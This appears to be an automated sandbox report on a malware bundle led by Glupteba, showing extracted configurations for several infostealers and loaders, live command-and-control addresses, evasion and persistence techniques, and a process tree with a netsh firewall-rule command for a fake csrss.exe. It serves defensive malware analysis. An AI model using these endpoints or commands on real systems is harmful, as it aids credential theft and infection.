glupteba | 5719f946c9c01d25c4b870bef5c16549a38043e02aba33a2859cd4490f9ac998

Analysis

max time kernel
229s
max time network
1272s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
08/03/2024, 17:52

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

release.zip
Size

7.9MB
MD5

3d6d694ba79cb3f7ba918ea1c7df752b
SHA1

f4302d015f72b777c717d363afaf474cc745fbdd
SHA256

5719f946c9c01d25c4b870bef5c16549a38043e02aba33a2859cd4490f9ac998
SHA512

5bb54c7ae44f3a816fa700fffef7a7e2cd74e4d71d99588e10a765e2d98e49c74bb5b29d44c8ee4749a3405b0010ec2118d8101d5738fecac55b660cc5cf35fc
SSDEEP

196608:14ULFz/UR8Qfau86YNqlGvGhTDa/M0OwKucQ/2:1HOdfT85/XKU/2

Malware Config

Extracted

Family

risepro

95.217.142.46:50500

193.233.132.62

Extracted

Family

raccoon

Botnet

4ddee039c3c1cb01baf0736505e3e436

http://94.131.106.24:80

Attributes

user_agent
MrBidenNeverKnow

xor.plain

Extracted

Family

vidar

Version

8.1

Botnet

2de48e5cebb13eab4ddb53ad011d40d1

https://steamcommunity.com/profiles/76561199649267298

https://t.me/uprizin

Attributes

profile_id_v2
2de48e5cebb13eab4ddb53ad011d40d1
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 OPR/96.0.0.0

Extracted

Family

smokeloader

Version

2022

http://kamsmad.com/tmp/index.php

http://souzhensil.ru/tmp/index.php

http://teplokub.com.ua/tmp/index.php

rc4.i32

Extracted

Family

smokeloader

Botnet

pub3

Extracted

Family

raccoon

Attributes

user_agent
f

Signatures

Detect Vidar Stealer 3 IoCs

stealer

resource	yara_rule
behavioral2/memory/1856-651-0x0000000000400000-0x00000000021CF000-memory.dmp	family_vidar_v7
behavioral2/memory/1856-710-0x0000000000400000-0x00000000021CF000-memory.dmp	family_vidar_v7
behavioral2/memory/1856-644-0x0000000004150000-0x0000000004681000-memory.dmp	family_vidar_v7

Detect ZGRat V1 12 IoCs

resource	yara_rule
behavioral2/files/0x000700000002329e-164.dat	family_zgrat_v1
behavioral2/files/0x000700000002329c-510.dat	family_zgrat_v1
behavioral2/files/0x000700000002329e-518.dat	family_zgrat_v1
behavioral2/memory/2212-549-0x0000000000490000-0x00000000007B8000-memory.dmp	family_zgrat_v1
behavioral2/memory/4792-577-0x0000000000970000-0x00000000009E8000-memory.dmp	family_zgrat_v1
behavioral2/memory/1816-575-0x0000000000430000-0x00000000006CC000-memory.dmp	family_zgrat_v1
behavioral2/memory/2392-602-0x0000000000400000-0x000000000044C000-memory.dmp	family_zgrat_v1
behavioral2/files/0x0007000000023294-566.dat	family_zgrat_v1
behavioral2/memory/1544-512-0x00000000002F0000-0x00000000009DA000-memory.dmp	family_zgrat_v1
behavioral2/files/0x00070000000232a1-494.dat	family_zgrat_v1
behavioral2/files/0x000700000002329e-277.dat	family_zgrat_v1
behavioral2/files/0x000700000002329c-232.dat	family_zgrat_v1

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 6 IoCs

resource	yara_rule
behavioral2/memory/848-633-0x00000000043F0000-0x0000000004CDB000-memory.dmp	family_glupteba
behavioral2/memory/848-650-0x0000000000400000-0x00000000022F3000-memory.dmp	family_glupteba
behavioral2/memory/4480-659-0x0000000004470000-0x0000000004D5B000-memory.dmp	family_glupteba
behavioral2/memory/4480-661-0x0000000000400000-0x00000000022F3000-memory.dmp	family_glupteba
behavioral2/memory/4480-706-0x0000000000400000-0x00000000022F3000-memory.dmp	family_glupteba
behavioral2/memory/848-709-0x0000000000400000-0x00000000022F3000-memory.dmp	family_glupteba

Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon

Raccoon Stealer V2 payload 3 IoCs

resource	yara_rule
behavioral2/files/0x00070000000232c3-613.dat	family_raccoon_v2
behavioral2/memory/716-643-0x0000000000400000-0x0000000001A3C000-memory.dmp	family_raccoon_v2
behavioral2/memory/716-641-0x0000000001BC0000-0x0000000001C0E000-memory.dmp	family_raccoon_v2

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral2/memory/2392-602-0x0000000000400000-0x000000000044C000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	crtjW9FdAFh1RpA0LLVUF2bK.exe

Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4352	netsh.exe
5272	netsh.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks BIOS information in registry 2 TTPs 3 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	crtjW9FdAFh1RpA0LLVUF2bK.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	crtjW9FdAFh1RpA0LLVUF2bK.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	Install.exe

Executes dropped EXE 24 IoCs

pid	Process
3012	setup.exe
4480	XT2yUCFm3I_A8VHeNywSw5ta.exe
2212	JExlHeW7un3bke1OHHXh10ie.exe
4472	crtjW9FdAFh1RpA0LLVUF2bK.exe
688	I9ymkTTokwU3_itoLBYFoASS.exe
3868	y1JwebHBmbC_K8bpIfqY7dAT.exe
1856	XGRjqH3jMgozHbf6PoVnfQTH.exe
848	brfAj59VD3dbF2T6UbdmVF89.exe
3432	AfqN23MB7ZIBJA6OIzESsczD.exe
3488	O8XFuPPqGVPZVYUYSnSNUfon.exe
3004	oI1ZPB2vxSetVpZWfFiI6Wgi.exe
4600	oMPmIJRvLAHQ1Yl4K6ywiUDD.exe
5080	1d1mNOghqDYI4YsW8IbJNqwz.exe
3976	y1JwebHBmbC_K8bpIfqY7dAT.tmp
1544	otr_2ge4eomGQQmUEl_yFDKI.exe
1816	ASo1Xru8VS6Xfyo5j8fzoFUR.exe
4792	_kwqjZC3zYczCTpbpeL0J3HT.exe
2600	k80_0TvoDvIvtBz67zMxLD0b.exe
4744	magicmailmonitor.exe
452	Install.exe
4316	magicmailmonitor.exe
4400	Install.exe
716	wfplwfs.exe
4648	2.3.1.1.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Wine	crtjW9FdAFh1RpA0LLVUF2bK.exe

Loads dropped DLL 1 IoCs

pid	Process
3976	y1JwebHBmbC_K8bpIfqY7dAT.tmp

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service

T1102

flow	ioc
243	iplogger.org
113	bitbucket.org
122	bitbucket.org
123	bitbucket.org
141	bitbucket.org
142	bitbucket.org
170	bitbucket.org
242	iplogger.org

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
99	api.myip.com
102	api.myip.com
103	ipinfo.io
104	ipinfo.io

Drops file in System32 directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	setup.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\System32\GroupPolicy	setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	setup.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	setup.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 4792 set thread context of 2392	4792	_kwqjZC3zYczCTpbpeL0J3HT.exe	167
PID 1816 set thread context of 1036	1816	ASo1Xru8VS6Xfyo5j8fzoFUR.exe	175
PID 2212 set thread context of 6036	2212	JExlHeW7un3bke1OHHXh10ie.exe	506

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4640	sc.exe
5552	sc.exe
5320	sc.exe
5876	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 64 IoCs

pid	pid_target	Process	procid_target
3048	6036	WerFault.exe	257
5400	688	WerFault.exe
3232	1036	WerFault.exe
4448	3004	WerFault.exe	265
1196	1856	WerFault.exe
1936	1544	WerFault.exe	147
1892	2836	WerFault.exe	317
5160	5736	WerFault.exe	321
3640	5688	WerFault.exe	343
2520	5848	WerFault.exe	361
3228	5080	WerFault.exe	144
2888	5136	WerFault.exe	438
3336	5800	WerFault.exe	441
2548	3768	WerFault.exe	497
6052	1644	WerFault.exe	500
2244	5904	WerFault.exe	503
1936	6036	WerFault.exe	506
2520	5492	WerFault.exe	510
1496	5848	WerFault.exe	513
5936	6100	WerFault.exe	516
5676	5452	WerFault.exe	519
652	5928	WerFault.exe	523
5824	5580	WerFault.exe	528
1880	5888	WerFault.exe	531
5560	5480	WerFault.exe	534
6032	2992	WerFault.exe	537
3844	5848	WerFault.exe	540
4580	5732	WerFault.exe	544
6124	3584	WerFault.exe	547
2916	3436	WerFault.exe	550
1052	3696	WerFault.exe	553
5388	1328	WerFault.exe	556
6028	4460	WerFault.exe	559
2884	4896	WerFault.exe	563
2184	4500	WerFault.exe	566
3756	5480	WerFault.exe	571
860	1960	WerFault.exe	575
1140	4076	WerFault.exe	580
1128	4404	WerFault.exe	583
1696	5508	WerFault.exe	586
5164	4012	WerFault.exe	589
4024	2912	WerFault.exe	593
5740	5984	WerFault.exe	596
3632	1884	WerFault.exe	599
2472	5316	WerFault.exe	602
3904	4800	WerFault.exe	606
4076	1112	WerFault.exe	609
4404	1924	WerFault.exe	612
1588	2872	WerFault.exe	615
3232	3544	WerFault.exe	618
3236	3352	WerFault.exe	621
2912	3716	WerFault.exe	624
4776	4500	WerFault.exe	627
1680	1892	WerFault.exe	630
4532	5040	WerFault.exe	633
3012	544	WerFault.exe	636
8	2220	WerFault.exe	640
996	852	WerFault.exe	644
1272	388	WerFault.exe	647
5292	4640	WerFault.exe	650
2672	3232	WerFault.exe	653
3444	3236	WerFault.exe	656
5620	2236	WerFault.exe	666
5932	692	WerFault.exe	669

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	oMPmIJRvLAHQ1Yl4K6ywiUDD.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	oMPmIJRvLAHQ1Yl4K6ywiUDD.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	oMPmIJRvLAHQ1Yl4K6ywiUDD.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	1d1mNOghqDYI4YsW8IbJNqwz.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	1d1mNOghqDYI4YsW8IbJNqwz.exe

Creates scheduled task(s) 1 TTPs 18 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
5708	schtasks.exe
880	schtasks.exe
5852	schtasks.exe
1576	schtasks.exe
4788	schtasks.exe
1708	schtasks.exe
3956	schtasks.exe
4056	schtasks.exe
5332	schtasks.exe
5572	schtasks.exe
5532	schtasks.exe
4476	schtasks.exe
5472	schtasks.exe
4124	schtasks.exe
5960	schtasks.exe
2976	schtasks.exe
3096	schtasks.exe
2884	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3488	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	setup.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5304	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3012	setup.exe
3012	setup.exe
3976	y1JwebHBmbC_K8bpIfqY7dAT.tmp
3976	y1JwebHBmbC_K8bpIfqY7dAT.tmp
3488	O8XFuPPqGVPZVYUYSnSNUfon.exe
3488	O8XFuPPqGVPZVYUYSnSNUfon.exe
4600	oMPmIJRvLAHQ1Yl4K6ywiUDD.exe
4600	oMPmIJRvLAHQ1Yl4K6ywiUDD.exe
4280	powershell.exe
4280	powershell.exe
4280	powershell.exe
3460	Process not Found
3460	Process not Found
3460	Process not Found
3460	Process not Found
3460	Process not Found
3460	Process not Found
3460	Process not Found
3460	Process not Found
3460	Process not Found
3460	Process not Found
3460	Process not Found
3460	Process not Found
2392	RegAsm.exe
2392	RegAsm.exe
3460	Process not Found
3460	Process not Found
3460	Process not Found
3460	Process not Found
3460	Process not Found
3460	Process not Found
3460	Process not Found
3460	Process not Found
3460	Process not Found
3460	Process not Found
3460	Process not Found
3460	Process not Found
3460	Process not Found
3460	Process not Found
3460	Process not Found
3460	Process not Found
5080	1d1mNOghqDYI4YsW8IbJNqwz.exe
5080	1d1mNOghqDYI4YsW8IbJNqwz.exe
3460	Process not Found
3460	Process not Found
3460	Process not Found
3460	Process not Found
3460	Process not Found
3460	Process not Found
3460	Process not Found
3460	Process not Found
3460	Process not Found
3460	Process not Found
3460	Process not Found
3460	Process not Found
3460	Process not Found
3460	Process not Found
3460	Process not Found
3460	Process not Found
3460	Process not Found
3460	Process not Found
4448	powershell.exe
4448	powershell.exe
5420	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
4600	oMPmIJRvLAHQ1Yl4K6ywiUDD.exe

Suspicious use of AdjustPrivilegeToken 42 IoCs

description	pid	Process
Token: SeRestorePrivilege	4536	7zG.exe
Token: 35	4536	7zG.exe
Token: SeSecurityPrivilege	4536	7zG.exe
Token: SeSecurityPrivilege	4536	7zG.exe
Token: SeRestorePrivilege	5060	7zG.exe
Token: 35	5060	7zG.exe
Token: SeSecurityPrivilege	5060	7zG.exe
Token: SeSecurityPrivilege	5060	7zG.exe
Token: SeDebugPrivilege	2392	RegAsm.exe
Token: SeDebugPrivilege	4280	powershell.exe
Token: SeShutdownPrivilege	3460	Process not Found
Token: SeCreatePagefilePrivilege	3460	Process not Found
Token: SeShutdownPrivilege	3460	Process not Found
Token: SeCreatePagefilePrivilege	3460	Process not Found
Token: SeShutdownPrivilege	3460	Process not Found
Token: SeCreatePagefilePrivilege	3460	Process not Found
Token: SeShutdownPrivilege	3460	Process not Found
Token: SeCreatePagefilePrivilege	3460	Process not Found
Token: SeShutdownPrivilege	3460	Process not Found
Token: SeCreatePagefilePrivilege	3460	Process not Found
Token: SeDebugPrivilege	4448	powershell.exe
Token: SeDebugPrivilege	5420	powershell.exe
Token: SeShutdownPrivilege	3460	Process not Found
Token: SeCreatePagefilePrivilege	3460	Process not Found
Token: SeShutdownPrivilege	3460	Process not Found
Token: SeCreatePagefilePrivilege	3460	Process not Found
Token: SeShutdownPrivilege	3460	Process not Found
Token: SeCreatePagefilePrivilege	3460	Process not Found
Token: SeShutdownPrivilege	3460	Process not Found
Token: SeCreatePagefilePrivilege	3460	Process not Found
Token: SeShutdownPrivilege	3460	Process not Found
Token: SeCreatePagefilePrivilege	3460	Process not Found
Token: SeShutdownPrivilege	3460	Process not Found
Token: SeCreatePagefilePrivilege	3460	Process not Found
Token: SeShutdownPrivilege	5864	powercfg.exe
Token: SeCreatePagefilePrivilege	5864	powercfg.exe
Token: SeShutdownPrivilege	5836	powercfg.exe
Token: SeCreatePagefilePrivilege	5836	powercfg.exe
Token: SeShutdownPrivilege	5852	powercfg.exe
Token: SeCreatePagefilePrivilege	5852	powercfg.exe
Token: SeShutdownPrivilege	5844	powercfg.exe
Token: SeCreatePagefilePrivilege	5844	powercfg.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
4536	7zG.exe
5060	7zG.exe
3976	y1JwebHBmbC_K8bpIfqY7dAT.tmp

Suspicious use of SetWindowsHookEx 22 IoCs

pid	Process
3012	setup.exe
4480	XT2yUCFm3I_A8VHeNywSw5ta.exe
688	I9ymkTTokwU3_itoLBYFoASS.exe
3868	y1JwebHBmbC_K8bpIfqY7dAT.exe
3432	AfqN23MB7ZIBJA6OIzESsczD.exe
4472	crtjW9FdAFh1RpA0LLVUF2bK.exe
848	brfAj59VD3dbF2T6UbdmVF89.exe
4600	oMPmIJRvLAHQ1Yl4K6ywiUDD.exe
3004	oI1ZPB2vxSetVpZWfFiI6Wgi.exe
5080	1d1mNOghqDYI4YsW8IbJNqwz.exe
1856	XGRjqH3jMgozHbf6PoVnfQTH.exe
3976	y1JwebHBmbC_K8bpIfqY7dAT.tmp
2600	k80_0TvoDvIvtBz67zMxLD0b.exe
4744	magicmailmonitor.exe
452	Install.exe
4316	magicmailmonitor.exe
4400	Install.exe
716	wfplwfs.exe
2392	RegAsm.exe
1036	RegAsm.exe
4648	2.3.1.1.exe
6036	RegAsm.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3012 wrote to memory of 4480	3012	setup.exe	133
PID 3012 wrote to memory of 4480	3012	setup.exe	133
PID 3012 wrote to memory of 4480	3012	setup.exe	133
PID 3012 wrote to memory of 2212	3012	setup.exe	134
PID 3012 wrote to memory of 2212	3012	setup.exe	134
PID 3012 wrote to memory of 2212	3012	setup.exe	134
PID 3012 wrote to memory of 4472	3012	setup.exe	135
PID 3012 wrote to memory of 4472	3012	setup.exe	135
PID 3012 wrote to memory of 4472	3012	setup.exe	135
PID 3012 wrote to memory of 1856	3012	setup.exe	409
PID 3012 wrote to memory of 1856	3012	setup.exe	409
PID 3012 wrote to memory of 1856	3012	setup.exe	409
PID 3012 wrote to memory of 848	3012	setup.exe	136
PID 3012 wrote to memory of 848	3012	setup.exe	136
PID 3012 wrote to memory of 848	3012	setup.exe	136
PID 3012 wrote to memory of 688	3012	setup.exe	318
PID 3012 wrote to memory of 688	3012	setup.exe	318
PID 3012 wrote to memory of 688	3012	setup.exe	318
PID 3012 wrote to memory of 3868	3012	setup.exe	139
PID 3012 wrote to memory of 3868	3012	setup.exe	139
PID 3012 wrote to memory of 3868	3012	setup.exe	139
PID 3012 wrote to memory of 3432	3012	setup.exe	141
PID 3012 wrote to memory of 3432	3012	setup.exe	141
PID 3012 wrote to memory of 3432	3012	setup.exe	141
PID 3012 wrote to memory of 4600	3012	setup.exe	142
PID 3012 wrote to memory of 4600	3012	setup.exe	142
PID 3012 wrote to memory of 4600	3012	setup.exe	142
PID 3012 wrote to memory of 5080	3012	setup.exe	144
PID 3012 wrote to memory of 5080	3012	setup.exe	144
PID 3012 wrote to memory of 5080	3012	setup.exe	144
PID 3012 wrote to memory of 3488	3012	setup.exe	376
PID 3012 wrote to memory of 3488	3012	setup.exe	376
PID 3012 wrote to memory of 3004	3012	setup.exe	145
PID 3012 wrote to memory of 3004	3012	setup.exe	145
PID 3012 wrote to memory of 3004	3012	setup.exe	145
PID 3868 wrote to memory of 3976	3868	y1JwebHBmbC_K8bpIfqY7dAT.exe	146
PID 3868 wrote to memory of 3976	3868	y1JwebHBmbC_K8bpIfqY7dAT.exe	146
PID 3868 wrote to memory of 3976	3868	y1JwebHBmbC_K8bpIfqY7dAT.exe	146
PID 3012 wrote to memory of 1816	3012	setup.exe	381
PID 3012 wrote to memory of 1816	3012	setup.exe	381
PID 3012 wrote to memory of 1816	3012	setup.exe	381
PID 3012 wrote to memory of 1544	3012	setup.exe	358
PID 3012 wrote to memory of 1544	3012	setup.exe	358
PID 3012 wrote to memory of 1544	3012	setup.exe	358
PID 3012 wrote to memory of 2600	3012	setup.exe	149
PID 3012 wrote to memory of 2600	3012	setup.exe	149
PID 3012 wrote to memory of 2600	3012	setup.exe	149
PID 3012 wrote to memory of 4792	3012	setup.exe	391
PID 3012 wrote to memory of 4792	3012	setup.exe	391
PID 3012 wrote to memory of 4792	3012	setup.exe	391
PID 3976 wrote to memory of 4744	3976	y1JwebHBmbC_K8bpIfqY7dAT.tmp	357
PID 3976 wrote to memory of 4744	3976	y1JwebHBmbC_K8bpIfqY7dAT.tmp	357
PID 3976 wrote to memory of 4744	3976	y1JwebHBmbC_K8bpIfqY7dAT.tmp	357
PID 3432 wrote to memory of 452	3432	AfqN23MB7ZIBJA6OIzESsczD.exe	153
PID 3432 wrote to memory of 452	3432	AfqN23MB7ZIBJA6OIzESsczD.exe	153
PID 3432 wrote to memory of 452	3432	AfqN23MB7ZIBJA6OIzESsczD.exe	153
PID 3976 wrote to memory of 4316	3976	y1JwebHBmbC_K8bpIfqY7dAT.tmp	155
PID 3976 wrote to memory of 4316	3976	y1JwebHBmbC_K8bpIfqY7dAT.tmp	155
PID 3976 wrote to memory of 4316	3976	y1JwebHBmbC_K8bpIfqY7dAT.tmp	155
PID 2212 wrote to memory of 1092	2212	JExlHeW7un3bke1OHHXh10ie.exe	157
PID 2212 wrote to memory of 1092	2212	JExlHeW7un3bke1OHHXh10ie.exe	157
PID 2212 wrote to memory of 1092	2212	JExlHeW7un3bke1OHHXh10ie.exe	157
PID 452 wrote to memory of 4400	452	Install.exe	156
PID 452 wrote to memory of 4400	452	Install.exe	156

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\release.zip
1⤵
PID:2752

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3880

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap10246:72:7zEvent32679
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4536

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap22687:72:7zEvent1361
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5060

C:\Users\Admin\Desktop\setup.exe
"C:\Users\Admin\Desktop\setup.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3012
- C:\Users\Admin\Documents\GuardFox\XT2yUCFm3I_A8VHeNywSw5ta.exe
  "C:\Users\Admin\Documents\GuardFox\XT2yUCFm3I_A8VHeNywSw5ta.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4480
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -nologo -noprofile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4448
- - C:\Users\Admin\Documents\GuardFox\XT2yUCFm3I_A8VHeNywSw5ta.exe
    "C:\Users\Admin\Documents\GuardFox\XT2yUCFm3I_A8VHeNywSw5ta.exe"
    3⤵
    PID:4712
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:2992
  - - C:\Windows\system32\cmd.exe
      C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
      4⤵
      PID:4688
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        
        PID:5272
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:5928
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:2908
- C:\Users\Admin\Documents\GuardFox\JExlHeW7un3bke1OHHXh10ie.exe
  "C:\Users\Admin\Documents\GuardFox\JExlHeW7un3bke1OHHXh10ie.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:2212
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:1092
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:3680
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4488
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5056
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:992
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:3420
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:1112
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:2096
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4944
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:2872
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:2248
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4744
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:3528
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:1936
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5116
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4768
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
